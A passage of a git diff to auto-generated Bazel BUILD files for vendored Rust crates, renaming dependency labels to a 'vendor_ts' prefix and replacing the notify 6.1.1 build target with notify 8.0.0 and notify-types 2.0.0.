"@rules_rust//rust/platform:i686-unknown-freebsd": [ - "@vendor__libc-0.2.169//:libc", # cfg(unix) + "@vendor_ts__libc-0.2.169//:libc", # cfg(unix) ], "@rules_rust//rust/platform:i686-unknown-linux-gnu": [ - "@vendor__libc-0.2.169//:libc", # cfg(unix) + "@vendor_ts__libc-0.2.169//:libc", # cfg(unix) ], "@rules_rust//rust/platform:powerpc-unknown-linux-gnu": [ - "@vendor__libc-0.2.169//:libc", # cfg(unix) + "@vendor_ts__libc-0.2.169//:libc", # cfg(unix) ], "@rules_rust//rust/platform:s390x-unknown-linux-gnu": [ - "@vendor__libc-0.2.169//:libc", # cfg(unix) + "@vendor_ts__libc-0.2.169//:libc", # cfg(unix) ], "@rules_rust//rust/platform:wasm32-wasip1": [ - "@vendor__libc-0.2.169//:libc", # cfg(target_os = "wasi") - "@vendor__wasi-0.11.0-wasi-snapshot-preview1//:wasi", # cfg(target_os = "wasi") + "@vendor_ts__libc-0.2.169//:libc", # cfg(target_os = "wasi") + "@vendor_ts__wasi-0.11.0-wasi-snapshot-preview1//:wasi", # cfg(target_os = "wasi") ], "@rules_rust//rust/platform:x86_64-apple-darwin": [ - "@vendor__libc-0.2.169//:libc", # cfg(unix) + "@vendor_ts__libc-0.2.169//:libc", # cfg(unix) ], "@rules_rust//rust/platform:x86_64-apple-ios": [ - "@vendor__libc-0.2.169//:libc", # cfg(unix) + "@vendor_ts__libc-0.2.169//:libc", # cfg(unix) ], "@rules_rust//rust/platform:x86_64-linux-android": [ - "@vendor__libc-0.2.169//:libc", # cfg(unix) + "@vendor_ts__libc-0.2.169//:libc", # cfg(unix) ], "@rules_rust//rust/platform:x86_64-pc-windows-msvc": [ - "@vendor__windows-sys-0.48.0//:windows_sys", # cfg(windows) + "@vendor_ts__windows-sys-0.52.0//:windows_sys", # cfg(windows) ], "@rules_rust//rust/platform:x86_64-unknown-freebsd": [ - "@vendor__libc-0.2.169//:libc", # cfg(unix) + "@vendor_ts__libc-0.2.169//:libc", # cfg(unix) ], "@rules_rust//rust/platform:x86_64-unknown-fuchsia": [ - "@vendor__libc-0.2.169//:libc", # cfg(unix) + "@vendor_ts__libc-0.2.169//:libc", # cfg(unix) ], "@rules_rust//rust/platform:x86_64-unknown-linux-gnu": [ - "@vendor__libc-0.2.169//:libc", # cfg(unix) + "@vendor_ts__libc-0.2.169//:libc", # cfg(unix) ], "@rules_rust//rust/platform:x86_64-unknown-nixos-gnu": [ - "@vendor__libc-0.2.169//:libc", # cfg(unix) + "@vendor_ts__libc-0.2.169//:libc", # cfg(unix) ], "//conditions:default": [], }), diff --git a/misc/bazel/3rdparty/tree_sitter_extractors_deps/BUILD.miow-0.6.0.bazel b/misc/bazel/3rdparty/tree_sitter_extractors_deps/BUILD.miow-0.6.0.bazel index ff7ceeb231e5..373f357ebb5b 100644 --- a/misc/bazel/3rdparty/tree_sitter_extractors_deps/BUILD.miow-0.6.0.bazel +++ b/misc/bazel/3rdparty/tree_sitter_extractors_deps/BUILD.miow-0.6.0.bazel @@ -81,6 +81,6 @@ rust_library( }), version = "0.6.0", deps = [ - "@vendor__windows-sys-0.48.0//:windows_sys", + "@vendor_ts__windows-sys-0.48.0//:windows_sys", ], ) diff --git a/misc/bazel/3rdparty/tree_sitter_extractors_deps/BUILD.mustache-0.9.0.bazel b/misc/bazel/3rdparty/tree_sitter_extractors_deps/BUILD.mustache-0.9.0.bazel index 23106f8a48ce..d21d1c5497c8 100644 --- a/misc/bazel/3rdparty/tree_sitter_extractors_deps/BUILD.mustache-0.9.0.bazel +++ b/misc/bazel/3rdparty/tree_sitter_extractors_deps/BUILD.mustache-0.9.0.bazel @@ -81,7 +81,7 @@ rust_library( }), version = "0.9.0", deps = [ - "@vendor__log-0.3.9//:log", - "@vendor__serde-1.0.217//:serde", + "@vendor_ts__log-0.3.9//:log", + "@vendor_ts__serde-1.0.218//:serde", ], ) diff --git a/misc/bazel/3rdparty/tree_sitter_extractors_deps/BUILD.notify-6.1.1.bazel b/misc/bazel/3rdparty/tree_sitter_extractors_deps/BUILD.notify-6.1.1.bazel deleted file mode 100644 index 261a1067fb6e..000000000000 --- a/misc/bazel/3rdparty/tree_sitter_extractors_deps/BUILD.notify-6.1.1.bazel +++ /dev/null @@ -1,179 +0,0 @@ -############################################################################### -# @generated -# DO NOT MODIFY: This file is auto-generated by a crate_universe tool. To -# regenerate this file, run the following: -# -# bazel run @@//misc/bazel/3rdparty:vendor_tree_sitter_extractors -############################################################################### - -load("@rules_rust//rust:defs.bzl", "rust_library") - -package(default_visibility = ["//visibility:public"]) - -rust_library( - name = "notify", - srcs = glob( - include = ["**/*.rs"], - allow_empty = True, - ), - compile_data = glob( - include = ["**"], - allow_empty = True, - exclude = [ - "**/* *", - ".tmp_git_root/**/*", - "BUILD", - "BUILD.bazel", - "WORKSPACE", - "WORKSPACE.bazel", - ], - ), - crate_features = [ - "crossbeam-channel", - "default", - "fsevent-sys", - "macos_fsevent", - ], - crate_root = "src/lib.rs", - edition = "2021", - rustc_flags = [ - "--cap-lints=allow", - ], - tags = [ - "cargo-bazel", - "crate-name=notify", - "manual", - "noclippy", - "norustfmt", - ], - target_compatible_with = select({ - "@rules_rust//rust/platform:aarch64-apple-darwin": [], - "@rules_rust//rust/platform:aarch64-apple-ios": [], - "@rules_rust//rust/platform:aarch64-apple-ios-sim": [], - "@rules_rust//rust/platform:aarch64-linux-android": [], - "@rules_rust//rust/platform:aarch64-pc-windows-msvc": [], - "@rules_rust//rust/platform:aarch64-unknown-fuchsia": [], - "@rules_rust//rust/platform:aarch64-unknown-linux-gnu": [], - "@rules_rust//rust/platform:aarch64-unknown-nixos-gnu": [], - "@rules_rust//rust/platform:aarch64-unknown-nto-qnx710": [], - "@rules_rust//rust/platform:aarch64-unknown-uefi": [], - "@rules_rust//rust/platform:arm-unknown-linux-gnueabi": [], - "@rules_rust//rust/platform:armv7-linux-androideabi": [], - "@rules_rust//rust/platform:armv7-unknown-linux-gnueabi": [], - "@rules_rust//rust/platform:i686-apple-darwin": [], - "@rules_rust//rust/platform:i686-linux-android": [], - "@rules_rust//rust/platform:i686-pc-windows-msvc": [], - "@rules_rust//rust/platform:i686-unknown-freebsd": [], - "@rules_rust//rust/platform:i686-unknown-linux-gnu": [], - "@rules_rust//rust/platform:powerpc-unknown-linux-gnu": [], - "@rules_rust//rust/platform:riscv32imc-unknown-none-elf": [], - "@rules_rust//rust/platform:riscv64gc-unknown-none-elf": [], - "@rules_rust//rust/platform:s390x-unknown-linux-gnu": [], - "@rules_rust//rust/platform:thumbv7em-none-eabi": [], - "@rules_rust//rust/platform:thumbv8m.main-none-eabi": [], - "@rules_rust//rust/platform:wasm32-unknown-unknown": [], - "@rules_rust//rust/platform:wasm32-wasip1": [], - "@rules_rust//rust/platform:x86_64-apple-darwin": [], - "@rules_rust//rust/platform:x86_64-apple-ios": [], - "@rules_rust//rust/platform:x86_64-linux-android": [], - "@rules_rust//rust/platform:x86_64-pc-windows-msvc": [], - "@rules_rust//rust/platform:x86_64-unknown-freebsd": [], - "@rules_rust//rust/platform:x86_64-unknown-fuchsia": [], - "@rules_rust//rust/platform:x86_64-unknown-linux-gnu": [], - "@rules_rust//rust/platform:x86_64-unknown-nixos-gnu": [], - "@rules_rust//rust/platform:x86_64-unknown-none": [], - "@rules_rust//rust/platform:x86_64-unknown-uefi": [], - "//conditions:default": ["@platforms//:incompatible"], - }), - version = "6.1.1", - deps = [ - "@vendor__crossbeam-channel-0.5.14//:crossbeam_channel", - "@vendor__filetime-0.2.25//:filetime", - "@vendor__libc-0.2.169//:libc", - "@vendor__log-0.4.22//:log", - "@vendor__walkdir-2.5.0//:walkdir", - ] + select({ - "@rules_rust//rust/platform:aarch64-apple-darwin": [ - "@vendor__bitflags-2.7.0//:bitflags", # cfg(target_os = "macos") - "@vendor__fsevent-sys-4.1.0//:fsevent_sys", # aarch64-apple-darwin - ], - "@rules_rust//rust/platform:aarch64-linux-android": [ - "@vendor__inotify-0.9.6//:inotify", # cfg(any(target_os = "linux", target_os = "android")) - "@vendor__mio-0.8.11//:mio", # cfg(any(target_os = "linux", target_os = "android")) - ], - "@rules_rust//rust/platform:aarch64-pc-windows-msvc": [ - "@vendor__windows-sys-0.48.0//:windows_sys", # cfg(windows) - ], - "@rules_rust//rust/platform:aarch64-unknown-linux-gnu": [ - "@vendor__inotify-0.9.6//:inotify", # cfg(any(target_os = "linux", target_os = "android")) - "@vendor__mio-0.8.11//:mio", # cfg(any(target_os = "linux", target_os = "android")) - ], - "@rules_rust//rust/platform:aarch64-unknown-nixos-gnu": [ - "@vendor__inotify-0.9.6//:inotify", # cfg(any(target_os = "linux", target_os = "android")) - "@vendor__mio-0.8.11//:mio", # cfg(any(target_os = "linux", target_os = "android")) - ], - "@rules_rust//rust/platform:arm-unknown-linux-gnueabi": [ - "@vendor__inotify-0.9.6//:inotify", # cfg(any(target_os = "linux", target_os = "android")) - "@vendor__mio-0.8.11//:mio", # cfg(any(target_os = "linux", target_os = "android")) - ], - "@rules_rust//rust/platform:armv7-linux-androideabi": [ - "@vendor__inotify-0.9.6//:inotify", # cfg(any(target_os = "linux", target_os = "android")) - "@vendor__mio-0.8.11//:mio", # cfg(any(target_os = "linux", target_os = "android")) - ], - "@rules_rust//rust/platform:armv7-unknown-linux-gnueabi": [ - "@vendor__inotify-0.9.6//:inotify", # cfg(any(target_os = "linux", target_os = "android")) - "@vendor__mio-0.8.11//:mio", # cfg(any(target_os = "linux", target_os = "android")) - ], - "@rules_rust//rust/platform:i686-apple-darwin": [ - "@vendor__bitflags-2.7.0//:bitflags", # cfg(target_os = "macos") - "@vendor__fsevent-sys-4.1.0//:fsevent_sys", # i686-apple-darwin - ], - "@rules_rust//rust/platform:i686-linux-android": [ - "@vendor__inotify-0.9.6//:inotify", # cfg(any(target_os = "linux", target_os = "android")) - "@vendor__mio-0.8.11//:mio", # cfg(any(target_os = "linux", target_os = "android")) - ], - "@rules_rust//rust/platform:i686-pc-windows-msvc": [ - "@vendor__windows-sys-0.48.0//:windows_sys", # cfg(windows) - ], - "@rules_rust//rust/platform:i686-unknown-freebsd": [ - "@vendor__kqueue-1.0.8//:kqueue", # cfg(any(target_os = "freebsd", target_os = "openbsd", target_os = "netbsd", target_os = "dragonflybsd")) - "@vendor__mio-0.8.11//:mio", # cfg(any(target_os = "freebsd", target_os = "openbsd", target_os = "netbsd", target_os = "dragonflybsd")) - ], - "@rules_rust//rust/platform:i686-unknown-linux-gnu": [ - "@vendor__inotify-0.9.6//:inotify", # cfg(any(target_os = "linux", target_os = "android")) - "@vendor__mio-0.8.11//:mio", # cfg(any(target_os = "linux", target_os = "android")) - ], - "@rules_rust//rust/platform:powerpc-unknown-linux-gnu": [ - "@vendor__inotify-0.9.6//:inotify", # cfg(any(target_os = "linux", target_os = "android")) - "@vendor__mio-0.8.11//:mio", # cfg(any(target_os = "linux", target_os = "android")) - ], - "@rules_rust//rust/platform:s390x-unknown-linux-gnu": [ - "@vendor__inotify-0.9.6//:inotify", # cfg(any(target_os = "linux", target_os = "android")) - "@vendor__mio-0.8.11//:mio", # cfg(any(target_os = "linux", target_os = "android")) - ], - "@rules_rust//rust/platform:x86_64-apple-darwin": [ - "@vendor__bitflags-2.7.0//:bitflags", # cfg(target_os = "macos") - "@vendor__fsevent-sys-4.1.0//:fsevent_sys", # x86_64-apple-darwin - ], - "@rules_rust//rust/platform:x86_64-linux-android": [ - "@vendor__inotify-0.9.6//:inotify", # cfg(any(target_os = "linux", target_os = "android")) - "@vendor__mio-0.8.11//:mio", # cfg(any(target_os = "linux", target_os = "android")) - ], - "@rules_rust//rust/platform:x86_64-pc-windows-msvc": [ - "@vendor__windows-sys-0.48.0//:windows_sys", # cfg(windows) - ], - "@rules_rust//rust/platform:x86_64-unknown-freebsd": [ - "@vendor__kqueue-1.0.8//:kqueue", # cfg(any(target_os = "freebsd", target_os = "openbsd", target_os = "netbsd", target_os = "dragonflybsd")) - "@vendor__mio-0.8.11//:mio", # cfg(any(target_os = "freebsd", target_os = "openbsd", target_os = "netbsd", target_os = "dragonflybsd")) - ], - "@rules_rust//rust/platform:x86_64-unknown-linux-gnu": [ - "@vendor__inotify-0.9.6//:inotify", # cfg(any(target_os = "linux", target_os = "android")) - "@vendor__mio-0.8.11//:mio", # cfg(any(target_os = "linux", target_os = "android")) - ], - "@rules_rust//rust/platform:x86_64-unknown-nixos-gnu": [ - "@vendor__inotify-0.9.6//:inotify", # cfg(any(target_os = "linux", target_os = "android")) - "@vendor__mio-0.8.11//:mio", # cfg(any(target_os = "linux", target_os = "android")) - ], - "//conditions:default": [], - }), -) diff --git a/misc/bazel/3rdparty/tree_sitter_extractors_deps/BUILD.notify-8.0.0.bazel b/misc/bazel/3rdparty/tree_sitter_extractors_deps/BUILD.notify-8.0.0.bazel new file mode 100644 index 000000000000..43a411a44ef6 --- /dev/null +++ b/misc/bazel/3rdparty/tree_sitter_extractors_deps/BUILD.notify-8.0.0.bazel @@ -0,0 +1,190 @@ +############################################################################### +# @generated +# DO NOT MODIFY: This file is auto-generated by a crate_universe tool. To +# regenerate this file, run the following: +# +# bazel run @@//misc/bazel/3rdparty:vendor_tree_sitter_extractors +############################################################################### + +load("@rules_rust//rust:defs.bzl", "rust_library") + +package(default_visibility = ["//visibility:public"]) + +rust_library( + name = "notify", + srcs = glob( + include = ["**/*.rs"], + allow_empty = True, + ), + compile_data = glob( + include = ["**"], + allow_empty = True, + exclude = [ + "**/* *", + ".tmp_git_root/**/*", + "BUILD", + "BUILD.bazel", + "WORKSPACE", + "WORKSPACE.bazel", + ], + ), + crate_features = [ + "default", + "fsevent-sys", + "macos_fsevent", + ], + crate_root = "src/lib.rs", + edition = "2021", + rustc_flags = [ + "--cap-lints=allow", + ], + tags = [ + "cargo-bazel", + "crate-name=notify", + "manual", + "noclippy", + "norustfmt", + ], + target_compatible_with = select({ + "@rules_rust//rust/platform:aarch64-apple-darwin": [], + "@rules_rust//rust/platform:aarch64-apple-ios": [], + "@rules_rust//rust/platform:aarch64-apple-ios-sim": [], + "@rules_rust//rust/platform:aarch64-linux-android": [], + "@rules_rust//rust/platform:aarch64-pc-windows-msvc": [], + "@rules_rust//rust/platform:aarch64-unknown-fuchsia": [], + "@rules_rust//rust/platform:aarch64-unknown-linux-gnu": [], + "@rules_rust//rust/platform:aarch64-unknown-nixos-gnu": [], + "@rules_rust//rust/platform:aarch64-unknown-nto-qnx710": [], + "@rules_rust//rust/platform:aarch64-unknown-uefi": [], + "@rules_rust//rust/platform:arm-unknown-linux-gnueabi": [], + "@rules_rust//rust/platform:armv7-linux-androideabi": [], + "@rules_rust//rust/platform:armv7-unknown-linux-gnueabi": [], + "@rules_rust//rust/platform:i686-apple-darwin": [], + "@rules_rust//rust/platform:i686-linux-android": [], + "@rules_rust//rust/platform:i686-pc-windows-msvc": [], + "@rules_rust//rust/platform:i686-unknown-freebsd": [], + "@rules_rust//rust/platform:i686-unknown-linux-gnu": [], + "@rules_rust//rust/platform:powerpc-unknown-linux-gnu": [], + "@rules_rust//rust/platform:riscv32imc-unknown-none-elf": [], + "@rules_rust//rust/platform:riscv64gc-unknown-none-elf": [], + "@rules_rust//rust/platform:s390x-unknown-linux-gnu": [], + "@rules_rust//rust/platform:thumbv7em-none-eabi": [], + "@rules_rust//rust/platform:thumbv8m.main-none-eabi": [], + "@rules_rust//rust/platform:wasm32-unknown-unknown": [], + "@rules_rust//rust/platform:wasm32-wasip1": [], + "@rules_rust//rust/platform:x86_64-apple-darwin": [], + "@rules_rust//rust/platform:x86_64-apple-ios": [], + "@rules_rust//rust/platform:x86_64-linux-android": [], + "@rules_rust//rust/platform:x86_64-pc-windows-msvc": [], + "@rules_rust//rust/platform:x86_64-unknown-freebsd": [], + "@rules_rust//rust/platform:x86_64-unknown-fuchsia": [], + "@rules_rust//rust/platform:x86_64-unknown-linux-gnu": [], + "@rules_rust//rust/platform:x86_64-unknown-nixos-gnu": [], + "@rules_rust//rust/platform:x86_64-unknown-none": [], + "@rules_rust//rust/platform:x86_64-unknown-uefi": [], + "//conditions:default": ["@platforms//:incompatible"], + }), + version = "8.0.0", + deps = [ + "@vendor_ts__filetime-0.2.25//:filetime", + "@vendor_ts__libc-0.2.169//:libc", + "@vendor_ts__log-0.4.25//:log", + "@vendor_ts__notify-types-2.0.0//:notify_types", + "@vendor_ts__walkdir-2.5.0//:walkdir", + ] + select({ + "@rules_rust//rust/platform:aarch64-apple-darwin": [ + "@vendor_ts__bitflags-2.8.0//:bitflags", # cfg(target_os = "macos") + "@vendor_ts__fsevent-sys-4.1.0//:fsevent_sys", # aarch64-apple-darwin + ], + "@rules_rust//rust/platform:aarch64-apple-ios": [ + "@vendor_ts__kqueue-1.0.8//:kqueue", # cfg(any(target_os = "freebsd", target_os = "openbsd", target_os = "netbsd", target_os = "dragonflybsd", target_os = "ios")) + "@vendor_ts__mio-1.0.3//:mio", # cfg(any(target_os = "freebsd", target_os = "openbsd", target_os = "netbsd", target_os = "dragonflybsd", target_os = "ios")) + ], + "@rules_rust//rust/platform:aarch64-apple-ios-sim": [ + "@vendor_ts__kqueue-1.0.8//:kqueue", # cfg(any(target_os = "freebsd", target_os = "openbsd", target_os = "netbsd", target_os = "dragonflybsd", target_os = "ios")) + "@vendor_ts__mio-1.0.3//:mio", # cfg(any(target_os = "freebsd", target_os = "openbsd", target_os = "netbsd", target_os = "dragonflybsd", target_os = "ios")) + ], + "@rules_rust//rust/platform:aarch64-linux-android": [ + "@vendor_ts__inotify-0.11.0//:inotify", # cfg(any(target_os = "linux", target_os = "android")) + "@vendor_ts__mio-1.0.3//:mio", # cfg(any(target_os = "linux", target_os = "android")) + ], + "@rules_rust//rust/platform:aarch64-pc-windows-msvc": [ + "@vendor_ts__windows-sys-0.59.0//:windows_sys", # cfg(windows) + ], + "@rules_rust//rust/platform:aarch64-unknown-linux-gnu": [ + "@vendor_ts__inotify-0.11.0//:inotify", # cfg(any(target_os = "linux", target_os = "android")) + "@vendor_ts__mio-1.0.3//:mio", # cfg(any(target_os = "linux", target_os = "android")) + ], + "@rules_rust//rust/platform:aarch64-unknown-nixos-gnu": [ + "@vendor_ts__inotify-0.11.0//:inotify", # cfg(any(target_os = "linux", target_os = "android")) + "@vendor_ts__mio-1.0.3//:mio", # cfg(any(target_os = "linux", target_os = "android")) + ], + "@rules_rust//rust/platform:arm-unknown-linux-gnueabi": [ + "@vendor_ts__inotify-0.11.0//:inotify", # cfg(any(target_os = "linux", target_os = "android")) + "@vendor_ts__mio-1.0.3//:mio", # cfg(any(target_os = "linux", target_os = "android")) + ], + "@rules_rust//rust/platform:armv7-linux-androideabi": [ + "@vendor_ts__inotify-0.11.0//:inotify", # cfg(any(target_os = "linux", target_os = "android")) + "@vendor_ts__mio-1.0.3//:mio", # cfg(any(target_os = "linux", target_os = "android")) + ], + "@rules_rust//rust/platform:armv7-unknown-linux-gnueabi": [ + "@vendor_ts__inotify-0.11.0//:inotify", # cfg(any(target_os = "linux", target_os = "android")) + "@vendor_ts__mio-1.0.3//:mio", # cfg(any(target_os = "linux", target_os = "android")) + ], + "@rules_rust//rust/platform:i686-apple-darwin": [ + "@vendor_ts__bitflags-2.8.0//:bitflags", # cfg(target_os = "macos") + "@vendor_ts__fsevent-sys-4.1.0//:fsevent_sys", # i686-apple-darwin + ], + "@rules_rust//rust/platform:i686-linux-android": [ + "@vendor_ts__inotify-0.11.0//:inotify", # cfg(any(target_os = "linux", target_os = "android")) + "@vendor_ts__mio-1.0.3//:mio", # cfg(any(target_os = "linux", target_os = "android")) + ], + "@rules_rust//rust/platform:i686-pc-windows-msvc": [ + "@vendor_ts__windows-sys-0.59.0//:windows_sys", # cfg(windows) + ], + "@rules_rust//rust/platform:i686-unknown-freebsd": [ + "@vendor_ts__kqueue-1.0.8//:kqueue", # cfg(any(target_os = "freebsd", target_os = "openbsd", target_os = "netbsd", target_os = "dragonflybsd", target_os = "ios")) + "@vendor_ts__mio-1.0.3//:mio", # cfg(any(target_os = "freebsd", target_os = "openbsd", target_os = "netbsd", target_os = "dragonflybsd", target_os = "ios")) + ], + "@rules_rust//rust/platform:i686-unknown-linux-gnu": [ + "@vendor_ts__inotify-0.11.0//:inotify", # cfg(any(target_os = "linux", target_os = "android")) + "@vendor_ts__mio-1.0.3//:mio", # cfg(any(target_os = "linux", target_os = "android")) + ], + "@rules_rust//rust/platform:powerpc-unknown-linux-gnu": [ + "@vendor_ts__inotify-0.11.0//:inotify", # cfg(any(target_os = "linux", target_os = "android")) + "@vendor_ts__mio-1.0.3//:mio", # cfg(any(target_os = "linux", target_os = "android")) + ], + "@rules_rust//rust/platform:s390x-unknown-linux-gnu": [ + "@vendor_ts__inotify-0.11.0//:inotify", # cfg(any(target_os = "linux", target_os = "android")) + "@vendor_ts__mio-1.0.3//:mio", # cfg(any(target_os = "linux", target_os = "android")) + ], + "@rules_rust//rust/platform:x86_64-apple-darwin": [ + "@vendor_ts__bitflags-2.8.0//:bitflags", # cfg(target_os = "macos") + "@vendor_ts__fsevent-sys-4.1.0//:fsevent_sys", # x86_64-apple-darwin + ], + "@rules_rust//rust/platform:x86_64-apple-ios": [ + "@vendor_ts__kqueue-1.0.8//:kqueue", # cfg(any(target_os = "freebsd", target_os = "openbsd", target_os = "netbsd", target_os = "dragonflybsd", target_os = "ios")) + "@vendor_ts__mio-1.0.3//:mio", # cfg(any(target_os = "freebsd", target_os = "openbsd", target_os = "netbsd", target_os = "dragonflybsd", target_os = "ios")) + ], + "@rules_rust//rust/platform:x86_64-linux-android": [ + "@vendor_ts__inotify-0.11.0//:inotify", # cfg(any(target_os = "linux", target_os = "android")) + "@vendor_ts__mio-1.0.3//:mio", # cfg(any(target_os = "linux", target_os = "android")) + ], + "@rules_rust//rust/platform:x86_64-pc-windows-msvc": [ + "@vendor_ts__windows-sys-0.59.0//:windows_sys", # cfg(windows) + ], + "@rules_rust//rust/platform:x86_64-unknown-freebsd": [ + "@vendor_ts__kqueue-1.0.8//:kqueue", # cfg(any(target_os = "freebsd", target_os = "openbsd", target_os = "netbsd", target_os = "dragonflybsd", target_os = "ios")) + "@vendor_ts__mio-1.0.3//:mio", # cfg(any(target_os = "freebsd", target_os = "openbsd", target_os = "netbsd", target_os = "dragonflybsd", target_os = "ios")) + ], + "@rules_rust//rust/platform:x86_64-unknown-linux-gnu": [ + "@vendor_ts__inotify-0.11.0//:inotify", # cfg(any(target_os = "linux", target_os = "android")) + "@vendor_ts__mio-1.0.3//:mio", # cfg(any(target_os = "linux", target_os = "android")) + ], + "@rules_rust//rust/platform:x86_64-unknown-nixos-gnu": [ + "@vendor_ts__inotify-0.11.0//:inotify", # cfg(any(target_os = "linux", target_os = "android")) + "@vendor_ts__mio-1.0.3//:mio", # cfg(any(target_os = "linux", target_os = "android")) + ], + "//conditions:default": [], + }), +) diff --git a/misc/bazel/3rdparty/tree_sitter_extractors_deps/BUILD.ra_ap_limit-0.0.258.bazel b/misc/bazel/3rdparty/tree_sitter_extractors_deps/BUILD.notify-types-2.0.0.bazel similarity index 97% rename from misc/bazel/3rdparty/tree_sitter_extractors_deps/BUILD.ra_ap_limit-0.0.258.bazel rename to misc/bazel/3rdparty/tree_sitter_extractors_deps/BUILD.notify-types-2.0.0.bazel index 3589754e1c97..2a58d2dd5730 100644 --- a/misc/bazel/3rdparty/tree_sitter_extractors_deps/BUILD.ra_ap_limit-0.0.258.bazel +++ b/misc/bazel/3rdparty/tree_sitter_extractors_deps/BUILD.notify-types-2.0.0.bazel @@ -11,7 +11,7 @@ load("@rules_rust//rust:defs.bzl", "rust_library") package(default_visibility = ["//visibility:public"]) rust_library( - name = "ra_ap_limit", + name = "notify_types", srcs = glob( include = ["**/*.rs"], allow_empty = True, @@ -35,7 +35,7 @@ rust_library( ], tags = [ "cargo-bazel", - "crate-name=ra_ap_limit", + "crate-name=notify-types", "manual", "noclippy", "norustfmt", @@ -79,5 +79,5 @@ rust_library( "@rules_rust//rust/platform:x86_64-unknown-uefi": [], "//conditions:default": ["@platforms//:incompatible"], }), - version = "0.0.258", + version = "2.0.0", ) diff --git a/misc/bazel/3rdparty/tree_sitter_extractors_deps/BUILD.nu-ansi-term-0.46.0.bazel b/misc/bazel/3rdparty/tree_sitter_extractors_deps/BUILD.nu-ansi-term-0.46.0.bazel index 654e4c1d4a55..96808381d753 100644 --- a/misc/bazel/3rdparty/tree_sitter_extractors_deps/BUILD.nu-ansi-term-0.46.0.bazel +++ b/misc/bazel/3rdparty/tree_sitter_extractors_deps/BUILD.nu-ansi-term-0.46.0.bazel @@ -81,16 +81,16 @@ rust_library( }), version = "0.46.0", deps = [ - "@vendor__overload-0.1.1//:overload", + "@vendor_ts__overload-0.1.1//:overload", ] + select({ "@rules_rust//rust/platform:aarch64-pc-windows-msvc": [ - "@vendor__winapi-0.3.9//:winapi", # cfg(target_os = "windows") + "@vendor_ts__winapi-0.3.9//:winapi", # cfg(target_os = "windows") ], "@rules_rust//rust/platform:i686-pc-windows-msvc": [ - "@vendor__winapi-0.3.9//:winapi", # cfg(target_os = "windows") + "@vendor_ts__winapi-0.3.9//:winapi", # cfg(target_os = "windows") ], "@rules_rust//rust/platform:x86_64-pc-windows-msvc": [ - "@vendor__winapi-0.3.9//:winapi", # cfg(target_os = "windows") + "@vendor_ts__winapi-0.3.9//:winapi", # cfg(target_os = "windows") ], "//conditions:default": [], }), diff --git a/misc/bazel/3rdparty/tree_sitter_extractors_deps/BUILD.num-traits-0.2.19.bazel b/misc/bazel/3rdparty/tree_sitter_extractors_deps/BUILD.num-traits-0.2.19.bazel index a9087f9167ce..96213437ade3 100644 --- a/misc/bazel/3rdparty/tree_sitter_extractors_deps/BUILD.num-traits-0.2.19.bazel +++ b/misc/bazel/3rdparty/tree_sitter_extractors_deps/BUILD.num-traits-0.2.19.bazel @@ -86,7 +86,7 @@ rust_library( }), version = "0.2.19", deps = [ - "@vendor__num-traits-0.2.19//:build_script_build", + "@vendor_ts__num-traits-0.2.19//:build_script_build", ], ) @@ -142,7 +142,7 @@ cargo_build_script( version = "0.2.19", visibility = ["//visibility:private"], deps = [ - "@vendor__autocfg-1.4.0//:autocfg", + "@vendor_ts__autocfg-1.4.0//:autocfg", ], ) diff --git a/misc/bazel/3rdparty/tree_sitter_extractors_deps/BUILD.num_cpus-1.16.0.bazel b/misc/bazel/3rdparty/tree_sitter_extractors_deps/BUILD.num_cpus-1.16.0.bazel index 4e067f66eafa..ccbaed88173e 100644 --- a/misc/bazel/3rdparty/tree_sitter_extractors_deps/BUILD.num_cpus-1.16.0.bazel +++ b/misc/bazel/3rdparty/tree_sitter_extractors_deps/BUILD.num_cpus-1.16.0.bazel @@ -82,103 +82,103 @@ rust_library( version = "1.16.0", deps = select({ "@rules_rust//rust/platform:aarch64-apple-darwin": [ - "@vendor__libc-0.2.169//:libc", # cfg(not(windows)) + "@vendor_ts__libc-0.2.169//:libc", # cfg(not(windows)) ], "@rules_rust//rust/platform:aarch64-apple-ios": [ - "@vendor__libc-0.2.169//:libc", # cfg(not(windows)) + "@vendor_ts__libc-0.2.169//:libc", # cfg(not(windows)) ], "@rules_rust//rust/platform:aarch64-apple-ios-sim": [ - "@vendor__libc-0.2.169//:libc", # cfg(not(windows)) + "@vendor_ts__libc-0.2.169//:libc", # cfg(not(windows)) ], "@rules_rust//rust/platform:aarch64-linux-android": [ - "@vendor__libc-0.2.169//:libc", # cfg(not(windows)) + "@vendor_ts__libc-0.2.169//:libc", # cfg(not(windows)) ], "@rules_rust//rust/platform:aarch64-unknown-fuchsia": [ - "@vendor__libc-0.2.169//:libc", # cfg(not(windows)) + "@vendor_ts__libc-0.2.169//:libc", # cfg(not(windows)) ], "@rules_rust//rust/platform:aarch64-unknown-linux-gnu": [ - "@vendor__libc-0.2.169//:libc", # cfg(not(windows)) + "@vendor_ts__libc-0.2.169//:libc", # cfg(not(windows)) ], "@rules_rust//rust/platform:aarch64-unknown-nixos-gnu": [ - "@vendor__libc-0.2.169//:libc", # cfg(not(windows)) + "@vendor_ts__libc-0.2.169//:libc", # cfg(not(windows)) ], "@rules_rust//rust/platform:aarch64-unknown-nto-qnx710": [ - "@vendor__libc-0.2.169//:libc", # cfg(not(windows)) + "@vendor_ts__libc-0.2.169//:libc", # cfg(not(windows)) ], "@rules_rust//rust/platform:aarch64-unknown-uefi": [ - "@vendor__libc-0.2.169//:libc", # cfg(not(windows)) + "@vendor_ts__libc-0.2.169//:libc", # cfg(not(windows)) ], "@rules_rust//rust/platform:arm-unknown-linux-gnueabi": [ - "@vendor__libc-0.2.169//:libc", # cfg(not(windows)) + "@vendor_ts__libc-0.2.169//:libc", # cfg(not(windows)) ], "@rules_rust//rust/platform:armv7-linux-androideabi": [ - "@vendor__libc-0.2.169//:libc", # cfg(not(windows)) + "@vendor_ts__libc-0.2.169//:libc", # cfg(not(windows)) ], "@rules_rust//rust/platform:armv7-unknown-linux-gnueabi": [ - "@vendor__libc-0.2.169//:libc", # cfg(not(windows)) + "@vendor_ts__libc-0.2.169//:libc", # cfg(not(windows)) ], "@rules_rust//rust/platform:i686-apple-darwin": [ - "@vendor__libc-0.2.169//:libc", # cfg(not(windows)) + "@vendor_ts__libc-0.2.169//:libc", # cfg(not(windows)) ], "@rules_rust//rust/platform:i686-linux-android": [ - "@vendor__libc-0.2.169//:libc", # cfg(not(windows)) + "@vendor_ts__libc-0.2.169//:libc", # cfg(not(windows)) ], "@rules_rust//rust/platform:i686-unknown-freebsd": [ - "@vendor__libc-0.2.169//:libc", # cfg(not(windows)) + "@vendor_ts__libc-0.2.169//:libc", # cfg(not(windows)) ], "@rules_rust//rust/platform:i686-unknown-linux-gnu": [ - 